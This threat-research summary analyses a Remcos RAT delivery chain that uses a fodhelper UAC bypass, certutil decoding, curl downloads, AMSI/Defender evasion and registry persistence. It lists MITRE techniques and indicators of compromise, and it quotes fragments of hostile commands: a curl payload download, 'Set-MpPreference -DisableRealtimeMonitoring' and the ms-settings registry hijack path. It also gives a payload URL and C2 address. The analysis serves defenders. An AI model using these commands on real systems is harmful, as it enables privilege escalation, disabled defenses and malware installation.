Threat Research

RAT Delivered Through FODHelper – SANS Internet Storm Center

Securonix

I found a simple batch file (2.bat) that drops a Remcos RAT using an old fodhelper UAC bypass to gain high privileges. The dropper decodes embedded Base64 with certutil, then downloads and launches the malware chain, including a PowerShell-based stage that attempts to disable AMSI/Defender and persists via registry changes. #Remcos #Papero

Keypoints

  • Remcos RAT is delivered via a two-stage batch/dropper chain that leverages fodhelper to bypass User Account Control (UAC) and achieve high privileges.
  • The initial BAT decodes embedded Base64 using certutil to produce the next dropped BAT file and execute it.
  • The first-stage dropper downloads additional payloads (e.g., adhd.bat, net.vbs, and a PowerShell script) via curl and writes a registry-based persistence entry for fodhelper.
  • The PowerShell component (puedo.ps1) downloads and executes the final payload, attempts to bypass AMSI/Defender, and configures a C2 and operational settings.
  • The final payload is a Remcos RAT with a configured C2 (e.g., 171.22.30.7:5578) and a Papero botnet association; the sample’s SHA256 is 6e83574ed73d798183a1555a910dcc118ac05cf1eac77306ab6edfdcab9207c3.
  • AMSI/Defender evasion and registry-based persistence are used to maintain stealth and long-term access.
  • The article links Remcos to Malpedia and provides multiple artifact names and download URLs used in the chain.

MITRE Techniques

  • [T1548.002] Abuse Elevation: Bypass UAC using fodhelper – “search for specific registry keys and, if present, will execute their content with high privileges.”
  • [T1105] Ingress Tool Transfer – The dropper downloads payloads via curl, e.g., “curl.exe -s –output %USERPROFILE%Linksadhd.bat –url …”
  • [T1059.001] PowerShell – The Powershell stage downloads and executes payloads and disables security features, e.g., “powershell -NonInteractive -Command Add-MpPreference …”.
  • [T1140] Deobfuscate/Decode Files or Information – CertUtil decodes embedded Base64 to create the next stage BAT, e.g., “CERTUTIL -f -decode “%~f0″ …”.
  • [T1112] Modify Registry – Persistence via fodhelper by writing to “HKCU:SoftwareClassesms-settingsshellopencommand” and setting DelegateExecute.
  • [T1562.001] Impair Defenses – Attempts to disable AMSI and Microsoft Defender, e.g., “Set-MpPreference -DisableRealtimeMonitoring”
  • [T1059.003] Windows Command Shell – Use of batch scripts and command-line actions to stage and run components.

Indicators of Compromise

  • [SHA256] 6e83574ed73d798183a1555a910dcc118ac05cf1eac77306ab6edfdcab9207c3 – Remcos RAT sample hash referenced in the article.
  • [IP] 171.22.30.7:5578 – Remcos C2 server address used by the malware configuration.
  • [IP] 171.22.30.120 – Host for downloaded components (e.g., podía.ps1, adhd.bat, etc.).
  • [URL] http://171.22.30.120/puedo.ps1 – PowerShell dropper script downloaded by the chain.
  • [File name] 2.bat – Initial dropper; [File name] adhd.bat – Downloaded stage payload; 2 more hashes and file names are referenced (e.g., adhd – Copia.bat, net.vbs).

Read more: https://isc.sans.edu/diary/rss/29078